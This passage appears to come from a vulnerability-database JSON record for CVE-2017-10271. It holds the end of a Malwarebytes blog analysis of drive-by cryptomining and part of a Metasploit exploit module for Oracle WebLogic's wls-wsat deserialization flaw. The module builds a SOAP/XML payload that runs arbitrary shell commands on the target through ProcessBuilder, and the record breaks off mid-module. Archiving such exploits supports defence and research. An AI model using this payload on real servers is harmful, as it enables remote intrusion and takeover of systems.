advertising.\n\n#### **No opt-in by default**\n\nWithin weeks, the Coinhive API, void of any safeguards, was abused in drive-by cryptomining attacks. 
Similar to drive-by downloads, [drive-by mining](<https://blog.malwarebytes.com/cybercrime/2017/11/a-look-into-the-global-drive-by-cryptocurrency-mining-phenomenon/>) is an automated, silent, and platform agnostic technique that forces visitors to a website to mine for cryptocurrency.\n\nWe witnessed an interesting [campaign](<https://blog.malwarebytes.com/threat-analysis/2018/02/drive-by-cryptomining-campaign-attracts-millions-of-android-users/>) that was specifically designed for Android and drew millions of users to pages that immediately started to mine for Monero under the pretense of recouping server costs. Even though mobile devices aren't as powerful as desktops, let alone servers, this event showed that no one is immune to drive-by mining.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Android_Drive_by-mining-1-1.png> \"\" )\n\n_Figure 6: An in-browser miner for Chrome on Android _\n\n[Malvertising](<https://blog.malwarebytes.com/threat-analysis/2017/09/drive-by-mining-and-ads-the-wild-wild-west/>) was once again a major factor in spreading coin miners to a large audience, as we saw with the [YouTube case](<https://twitter.com/Mystic_Ervo/status/956237422391709696>) that involved malicious ads via DoubleClick. Another interesting vector, which security people have warned about for years, is the use of third-party scripts that have become ubiquitous. A company called Texthelp had one of their [plugins compromised](<https://www.troyhunt.com/the-javascript-supply-chain-paradox-sri-csp-and-trust-in-third-party-libraries/>) and injected with a Coinhive script, leading to hundreds of government websites in the UK unwillingly participating in malicious cryptomining activity.\n\nTo fend off criticism, Coinhive introduced a new API (AuthedMine) that explicitly requires user input for any mining activity to be allowed. 
The idea was that considerate website owners would use this more \u201cethical\u201d API instead, so that their visitors can knowingly opt-in or out before engaging in cryptomining. This was also an argument that Coinhive put forward to defend its stance against ad blockers and antivirus products.\n\nWhile only Coinhive themselves would have accurate statistics, according to our own telemetry the opt-in version of their API was barely used (40K/day) in comparison to the silent one (3M/day), as pictured in the below histograms during the period of January 10 to February 6.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_opt-in-1.png> \"\" )\n\n_Figure 7: Usage statistics for the opt-in version of Coinhive_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_silent_drive-by-1.png> \"\" )\n\n_Figure 8: Usage statistics for the silent version of Coinhive_\n\nMoreover, even websites that do use the opt-in option may still be crippling machines by running an unthrottled miner, as was the case with popular[ American news website Salon](<https://twitter.com/jonathansampson/status/963465011153833984>)[[.]com](<https://twitter.com/jonathansampson/status/963465011153833984>).\n\n#### **Copycats**\n\nSeveral copycats emerged in the wake of Coinhive's immediate success. According to our stats, _coin-have[.]com_ is the second most popular service, followed by _crypto-loot[.]com_. 
While Coinhive takes a 30 percent commission on all mining earnings, Coin Have advertises the lowest commission rates in the market at 20 percent, although CryptoLoot itself claims to pay out 88 percent of mined commissions.\n\nIn additions to bigger payouts, other \u201cattractive\u201d features pushed by newcomers are low payment thresholds and the ability to bypass ad blockers, which they often view as their number one threat.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/copycats-1.png> \"\" )\n\n_Figure 9: Two of the most popular Coinhive copycats_\n\n#### **Browsers and technologies abused**\n\nContrary to malware-based coin miners, drive-by cryptomining does not require infecting a machine. This is both a strength and weakness in the sense that it can potentially reach a much wider audience but is also more ephemeral in nature.\n\nFor example, if a user navigates away from the website they are on or closes the offending tab, that will cause the mining activity to stop, which is a major drawback. However, we observed that some miners have developed sneaky ways of making drive-by mining [persistent](<https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/>), thanks to the use of pop-unders, a practice well-known in the ad fraud business. To add insult to injury, the malicious pop-under tab containing the mining code would get placed right underneath the taskbar, rendering it virtually invisible to the end user. Thanks to this trick, the mining can carry on until the user actually restarts their computer.\n\nAnother way to mine for long and uninterrupted periods of time is by using a booby-trapped browser extension that will inject code in each web session. 
This is what happened to the Archive Poster extension because one of their developers had his Google account credentials compromised.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/extension-1.png> \"\" )\n\n_Figure 10: The compromised extension with a rogue JavaScript for Coinhive_\n\nIt is worth noting that JavaScript is not the only way to mine for coins within the browser. Indeed, we have observed WebAssembly, a newer format available in modern browsers, being used more and more. WebAssembly modules have the advantage of running at near native speed, making them a lot faster and more efficient than JavaScript.\n \n \n | payload =\n \u00a0 - [ ExportSection\n \u00a0\u00a0\u00a0 | count = 27\n \u00a0\u00a0\u00a0 | entries =\n \u00a0\u00a0\u00a0 - [ ExportEntry\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_len = 9\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_str = \"stackSave\"\n \u00a0\u00a0\u00a0\u00a0\u00a0 | kind = 0x0\n \u00a0\u00a0\u00a0\u00a0\u00a0 | index = 71\n \u00a0\u00a0\u00a0 - [ ExportEntry\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_len = 17\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_str = \"_cryptonight_hash\"\n \u00a0\u00a0\u00a0\u00a0\u00a0 | kind = 0x0\n \u00a0\u00a0\u00a0\u00a0\u00a0 | index = 70\n\n_Figure 11: Code snippet from a WebAssembly module designed for mining Monero_\n\nWhile drive-by mining typically happens via the standard HTTP protocol\u2014either via HTTP or HTTPS connections\u2014we have witnessed more and more examples of miners communicating via WebSockets instead.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/websocket_-1.png> \"\" )\n\n_Figure 12: A Web Socket connection to Coinhive_\n\nA WebSocket is another communication protocol that allows streams of data to be exchanged. There is an initial handshake request and response with a remote server followed by the actual data streams. 
Coin mining code wrapped within a secure (wss) WebSocket is more difficult to identify and block.\n\n### Conclusion\n\nAs the threat landscape continues to evolve, its connections to real-world trends become more and more obvious. Malware authors are not only enjoying the relative anonymity provided by digital currencies but also want to amass them.\n\nCryptomining malware provides a good use case for leveraging the size and power of a botnet in order to perform CPU-intensive mining tasks without having to bear the costs incurred in the process. In some aspect, drive-by mining also applies the same concept, except that the botnet of web users it creates is mostly temporary.\n\nWhile malicious cryptomining appears to be far less dangerous to the user than ransomware, its effects should not be undermined. Indeed, unmanaged miners could seriously disrupt business or infrastructure critical processes by overloading systems to the point where they become unresponsive and shut down. Under the disguise of a financially-motivated attack, this could be the perfect alibi for advanced threat actors.\n\nMalwarebytes users, regardless of their platform, are protected against unwanted cryptomining, whether it is done via malware or the web.\n\nThe post [The state of malicious cryptomining](<https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-02-26T16:08:03", "type": "malwarebytes", "title": "The state of malicious cryptomining", 
"bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2018-02-26T16:08:03", "href": "https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/", "id": "MALWAREBYTES:B49179B9854ECB9B3B25403D4C9D0804", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2018-01-29T00:20:57", "description": "", "cvss3": {}, "published": "2018-01-28T00:00:00", "type": "packetstorm", "title": "Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-28T00:00:00", "id": "PACKETSTORM:146143", "href": "https://packetstormsecurity.com/files/146143/Oracle-WebLogic-wls-wsat-Component-Deserialization-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n# include Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE', \n'Description' => %q( \nThe Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization \nremote code execution vulnerability. Supported versions that are affected are \n10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. 
Discovered by Alexey Tyurin \nof ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, \nHTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check \nand will not be used when executing the exploit itself. \n), \n'License' => MSF_LICENSE, \n'Author' => [ \n'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module \n'Luffin', # Proof of Concept \n'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery \n], \n'References' => \n[ \n['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin \n['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept \n['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit \n['CVE', '2017-10271'], \n['EDB', '43458'] \n], \n'Platform' => %w{ win unix }, \n'Arch' => [ ARCH_CMD ], \n'Targets' => \n[ \n[ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ], \n[ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ] \n], \n'DisclosureDate' => \"Oct 19 2017\", \n# Note that this is by index, rather than name. It's generally easiest \n# just to put the default at the beginning of the list and skip this \n# entirely. 
\n'DefaultTarget' => 0 \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']), \nOptPort.new('RPORT', [true, \"The remote port that the WebLogic WSAT endpoint listens on\", 7001]), \nOptFloat.new('TIMEOUT', [true, \"The timeout value of requests to RHOST\", 20.0]), \n# OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10]) \n]) \nend \n \ndef cmd_base \nif target['Platform'] == 'win' \nreturn 'cmd' \nelse \nreturn '/bin/sh' \nend \nend \n \ndef cmd_opt \nif target['Platform'] == 'win' \nreturn '/c' \nelse \nreturn '-c' \nend \nend \n \n \n# \n# This generates a XML payload that will execute the desired payload on the RHOST \n# \ndef exploit_process_builder_payload \n# Generate a payload which will execute on a *nix machine using /bin/sh \nxml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soapenv:Header> \n<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n<java> \n<void class=\"java.lang.ProcessBuilder\"> \n<array class=\"java.lang.String\" length=\"3\" > \n<void index=\"0\"> \n<string>#{cmd_base}</string> \n</void> \n<void index=\"1\"> \n<string>#{cmd_opt}</string> \n</void> \n<void index=\"2\"> \n<string>#{payload.encoded.encode(xml: :text)}</string> \n</void> \n</array> \n<void method=\"start\"/> \n</void> \n</java> \n</work:WorkContext> \n</soapenv:Header> \n<soapenv:Body/> \n</soapenv:Envelope>} \nend \n \n# \n# This builds a XML payload that will generate a HTTP GET request to our SRVHOST \n# from the target machine. \n# \ndef check